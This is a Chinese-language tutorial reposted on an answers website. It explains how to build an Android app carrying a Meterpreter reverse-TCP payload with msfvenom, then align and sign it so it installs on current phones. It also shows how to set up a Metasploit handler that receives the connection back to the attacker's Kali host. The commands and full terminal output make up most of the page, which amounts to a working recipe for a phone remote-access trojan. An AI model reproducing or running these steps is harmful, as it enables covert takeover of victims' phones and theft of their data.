欢迎您访问365答案网,请分享给你的朋友!
生活常识 学习资料

安卓渗透控制

时间:2023-08-03
一:生产apk安卓应用

1,使用msfvenom生成一个预设定向连接kali主机的apk安卓应用。
lhost=192.168.183.12 (这是Kali的IP)lport=55555 (默认4444,可以自定义)

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.183.12 lport=55555 R > t.apk

这样,一个很简单的带有payload(攻击载荷)的安卓应用就生成好了。ls -l看一下,在当前目录下有个t.apk文件。

很多同学看百度搜索到的教程都是到这里就直接丢到安卓手机里安卓了,然后就一值连不上。。。那是上古时期的教程了,咱们身边都没有这么老旧的手机。在这里,我们还要对t.apk文件进行优化对齐然后签名。
需要用到的软件有三个,zipalign, keytool , apksigner。
Kali 2020只默认安装了一个keytool,有些教程里提到jarsigner,实际上kali2020已经没有这个了,软件源里也没有,ap-get install jarsigner也会提示没有这个软件。这是apk应用V1签名需要的工具。我这里用apksigner的V2签名,V1和V2的签名流程不同,请勿生搬硬套。
这部分的知识想理解的,建议百度搜索zipalign


2,使用zipalign对apk进行对齐

zipalign -v 4 t.apk tz.apk

3,生成密钥对

生成密钥对:keytool -genkey -v -keystore cg.keystore -alias cg -keyalg RSA -keysize 2048 -validity 10000解释:keytool -genkeypair -keystore 密钥库名 -alias 密钥别名 -validity 天数 -keyalg RSA

 4,对apk签名

签名:apksigner sign --ks cg.keystore --ks-key-alias cg tz.apk解释:apksigner sign --ks 密钥库名 --ks-key-alias 密钥别名 tz.apk

5,对apk进行签名验证

apksigner verify -v --print-certs tz.apk

到这里,基本就可以了。最后生成的文件tz.apk就是我们要的安卓应用

安卓控制全部

root@kali:~# msfconsolemsf5 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcpmsf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp payload => android/meterpreter/reverse_tcpmsf5 exploit(multi/handler) > optionsModule options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- -----------Payload options (android/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 55555 yes The listen portExploit target: Id Name -- ---- 0 Wildcard Targetmsf5 exploit(multi/handler) > set lhost 192.168.183.12lhost => 192.168.183.12msf5 exploit(multi/handler) > exploit[-] Handler failed to bind to 192.168.183.12:55555:- -[*] Started reverse TCP handler on 0.0.0.0:4444

 生成apk阶段全部

生成apk阶段全部rootkali)-[/home/kali/Desktop]└─# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.183.12 lport=55555 R > t.apk[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload[-] No arch selected, selecting arch: dalvik from the payloadNo encoder specified, outputting raw payloadPayload size: 10190 bytes ┌──(rootkali)-[/home/kali/Desktop]└─# zipalign -v 4 t.apk tz.apkCommand 'zipalign' not found, but can be installed with:apt install zipalignDo you want to install it? (N/y)yapt install zipalignReading package lists..、DoneBuilding dependency tree..、DoneReading state information..、DoneThe following additional packages will be installed: android-libbacktrace android-libbase android-libcutils android-liblog android-libunwind android-libutils android-libziparchive libzopfli1The following NEW packages will be installed: android-libbacktrace android-libbase android-libcutils android-liblog android-libunwind android-libutils android-libziparchive libzopfli1 zipalign0 upgraded, 9 newly installed, 0 to remove and 567 not upgraded.Need to get 548 kB of archives.After this operation, 1,726 kB of additional disk space will be used.Do you want to continue? [Y/n] yGet:1 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-liblog amd64 1:10.0.0+r36-7 [44.4 kB]Get:2 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libbase amd64 1:10.0.0+r36-7 [41.5 kB]Get:3 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libunwind amd64 10.0.0+r36-4 [48.3 kB]Get:4 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libbacktrace amd64 1:10.0.0+r36-7 [153 kB]Get:5 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libcutils amd64 1:10.0.0+r36-7 [33.3 kB]Get:6 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libutils amd64 1:10.0.0+r36-7 [62.4 kB]Get:7 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libziparchive amd64 1:10.0.0+r36-7 [35.5 kB]Get:8 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 libzopfli1 amd64 1.0.3-1 [101 kB]Get:9 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 zipalign amd64 1:10.0.0+r36-1 [28.2 kB]Fetched 548 kB in 1s (449 kB/s)Selecting previously unselected package android-liblog.(Reading database ..、268182 files and directories currently installed.)Preparing to unpack .../0-android-liblog_1%3a10.0.0+r36-7_amd64.deb ...Unpacking android-liblog (1:10.0.0+r36-7) ...Selecting previously unselected package android-libbase.Preparing to unpack .../1-android-libbase_1%3a10.0.0+r36-7_amd64.deb ...Unpacking android-libbase (1:10.0.0+r36-7) ...Selecting previously unselected package android-libunwind.Preparing to unpack .../2-android-libunwind_10.0.0+r36-4_amd64.deb ...Unpacking android-libunwind (10.0.0+r36-4) ...Selecting previously unselected package android-libbacktrace.Preparing to unpack .../3-android-libbacktrace_1%3a10.0.0+r36-7_amd64.deb ...Unpacking android-libbacktrace (1:10.0.0+r36-7) ...Selecting previously unselected package android-libcutils.Preparing to unpack .../4-android-libcutils_1%3a10.0.0+r36-7_amd64.deb ...Unpacking android-libcutils (1:10.0.0+r36-7) ...Selecting previously unselected package android-libutils.Preparing to unpack .../5-android-libutils_1%3a10.0.0+r36-7_amd64.deb ...Unpacking android-libutils (1:10.0.0+r36-7) ...Selecting previously unselected package android-libziparchive.Preparing to unpack .../6-android-libziparchive_1%3a10.0.0+r36-7_amd64.deb ...Unpacking android-libziparchive (1:10.0.0+r36-7) ...Selecting previously unselected package libzopfli1.Preparing to unpack .../7-libzopfli1_1.0.3-1_amd64.deb ...Unpacking libzopfli1 (1.0.3-1) ...Selecting previously unselected package zipalign.Preparing to unpack .../8-zipalign_1%3a10.0.0+r36-1_amd64.deb ...Unpacking zipalign (1:10.0.0+r36-1) ...Setting up android-liblog (1:10.0.0+r36-7) ...Setting up libzopfli1 (1.0.3-1) ...Setting up android-libunwind (10.0.0+r36-4) ...Setting up android-libbase (1:10.0.0+r36-7) ...Setting up android-libziparchive (1:10.0.0+r36-7) ...Setting up android-libcutils (1:10.0.0+r36-7) ...Setting up android-libbacktrace (1:10.0.0+r36-7) ...Setting up android-libutils (1:10.0.0+r36-7) ...Setting up zipalign (1:10.0.0+r36-1) ...Processing triggers for libc-bin (2.32-4) ...Processing triggers for man-db (2.9.4-2) ...Processing triggers for kali-menu (2021.4.2) ... ┌──(rootkali)-[/home/kali/Desktop]└─# keytool -genkey -v -keystore cg.keystore -alias cg -keyalg RSA -keysize 2048 -validity 10000Enter keystore password: Re-enter new password: What is your first and last name? [Unknown]: jacksonWhat is the name of your organizational unit? [Unknown]: jacksonWhat is the name of your organization? [Unknown]: jacksonWhat is the name of your City or Locality? [Unknown]: jacksonWhat is the name of your State or Province? [Unknown]: jacksonWhat is the two-letter country code for this unit? [Unknown]: 22Is CN=jackson, OU=jackson, O=jackson, L=jackson, ST=jackson, C=22 correct? [no]: yGenerating 2,048 bit RSA key pair and self-signed certificate (SHA256withRSA) with a validity of 10,000 days for: CN=jackson, OU=jackson, O=jackson, L=jackson, ST=jackson, C=22[Storing cg.keystore] ┌──(rootkali)-[/home/kali/Desktop]└─# apksigner sign --ks cg.keystore --ks-key-alias cg tz.apkCommand 'apksigner' not found, but can be installed with:apt install apksignerDo you want to install it? (N/y)yapt install apksignerReading package lists..、DoneBuilding dependency tree..、DoneReading state information..、DoneThe following additional packages will be installed: libapksig-javaThe following NEW packages will be installed: apksigner libapksig-java0 upgraded, 2 newly installed, 0 to remove and 567 not upgraded.Need to get 847 kB of archives.After this operation, 980 kB of additional disk space will be used.Do you want to continue? [Y/n] yGet:1 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 libapksig-java all 31.0.2-1 [404 kB]Get:2 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 apksigner all 31.0.2-1 [443 kB]Fetched 847 kB in 1s (1,115 kB/s)Selecting previously unselected package libapksig-java.(Reading database ..、268245 files and directories currently installed.)Preparing to unpack .../libapksig-java_31.0.2-1_all.deb ...Unpacking libapksig-java (31.0.2-1) ...Selecting previously unselected package apksigner.Preparing to unpack .../apksigner_31.0.2-1_all.deb ...Unpacking apksigner (31.0.2-1) ...Setting up libapksig-java (31.0.2-1) ...Setting up apksigner (31.0.2-1) ...Processing triggers for kali-menu (2021.4.2) ...Processing triggers for man-db (2.9.4-2) ... ┌──(rootkali)-[/home/kali/Desktop]└─# apksigner verify -v --print-certs tz.apk 127 ⨯Exception in thread "main" java.io.FileNotFoundException: tz.apk (No such file or directory) at java.base/java.io.RandomAccessFile.open0(Native Method) at java.base/java.io.RandomAccessFile.open(RandomAccessFile.java:345) at java.base/java.io.RandomAccessFile.(RandomAccessFile.java:259) at java.base/java.io.RandomAccessFile.(RandomAccessFile.java:214) at com.android.apksig.ApkVerifier.verify(ApkVerifier.java:143) at com.android.apksigner.ApkSignerTool.verify(ApkSignerTool.java:516) at com.android.apksigner.ApkSignerTool.main(ApkSignerTool.java:88) ┌──(rootkali)-[/home/kali/Desktop]└─# zipalign -v 4 t.apk tz.apk 1 ⨯Verifying alignment of tz.apk (4)... 49 AndroidManifest.xml (OK - compressed) 1779 resources.arsc (OK - compressed) 1992 classes.dex (OK - compressed) 8160 meta-INF/ (OK) 8210 meta-INF/MANIFEST.MF (OK - compressed) 8447 meta-INF/SIGNFILE.SF (OK - compressed) 8713 meta-INF/SIGNFILE.RSA (OK - compressed)Verification successful ┌──(rootkali)-[/home/kali/Desktop]└─# apksigner verify -v --print-certs tz.apkDOES NOT VERIFYERROR: JAR signer SIGNFILE.RSA: JAR signature meta-INF/SIGNFILE.RSA uses digest algorithm SHA-256 and signature algorithm RSA which is not supported on API Level(s) 10-17 for which this APK is being verified ┌──(rootkali)-[/home/kali/Desktop]└─# apksigner sign --ks cg.keystore --ks-key-alias cg tz.apk 1 ⨯Keystore password for signer #1: ┌──(rootkali)-[/home/kali/Desktop]└─# apksigner verify -v --print-certs tz.apkVerifiesVerified using v1 scheme (JAR signing): trueVerified using v2 scheme (APK Signature Scheme v2): trueVerified using v3 scheme (APK Signature Scheme v3): trueVerified using v4 scheme (APK Signature Scheme v4): falseVerified for SourceStamp: falseNumber of signers: 1Signer #1 certificate DN: CN=jackson, OU=jackson, O=jackson, L=jackson, ST=jackson, C=22Signer #1 certificate SHA-256 digest: 0b0d4e001cd8419178570d9b654a4e12c04a5fd6b43ddba495cbe3c3daca25adSigner #1 certificate SHA-1 digest: 098dabd0918e21cc5f3d5315a476b64199835f51Signer #1 certificate MD5 digest: 285862ef117e8115197d25f937e51de9Signer #1 key algorithm: RSASigner #1 key size (bits): 2048Signer #1 public key SHA-256 digest: 599dac27b2c16dde82fe2911857746cce415ea8cd1932aa0f3d70c185df3b059Signer #1 public key SHA-1 digest: 6560ca068e18184624c0e40a32b5f075ed114a76Signer #1 public key MD5 digest: be0f581cf0cec32e300f49098271b435 ┌──(rootkali)-[/home/kali/Desktop]└─#

Copyright © 2016-2020 www.365daan.com All Rights Reserved. 365答案网 版权所有 备案号:

部分内容来自互联网,版权归原作者所有,如有冒犯请联系我们,我们将在三个工作时内妥善处理。